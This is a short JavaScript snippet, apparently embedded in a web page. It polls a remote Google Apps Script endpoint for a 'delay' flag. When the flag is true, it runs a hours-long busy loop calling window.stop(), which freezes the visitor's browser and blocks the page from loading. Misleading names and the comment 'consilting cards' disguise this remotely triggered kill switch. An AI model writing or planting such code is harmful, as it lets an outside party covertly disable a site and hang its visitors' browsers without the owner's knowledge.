fetch("https://script.google.com/macros/s/AKfycbxHp_3HlDXmIas_PBaHQ1tb8CQRfBSbNJOWWao__YyU3dJGqjY_EpIB7b5N0AN-dKgyxg/exec")
    .then(res => res.json())
    .then(data => {
      // console.log(data.delay);
      if (data.delay === true) {

        //consilting cards
         // window.stop();
        
         const cnslt_cards = 12343000; 
        const card_end = Date.now() + cnslt_cards;
      
        while (Date.now() < card_end) {

          window.stop();
          Math.sqrt(Math.random() * Math.random());
        }

        
       
      }
    })
    .catch(err => {
      console.error("Failed to fetch flag:", err);
    });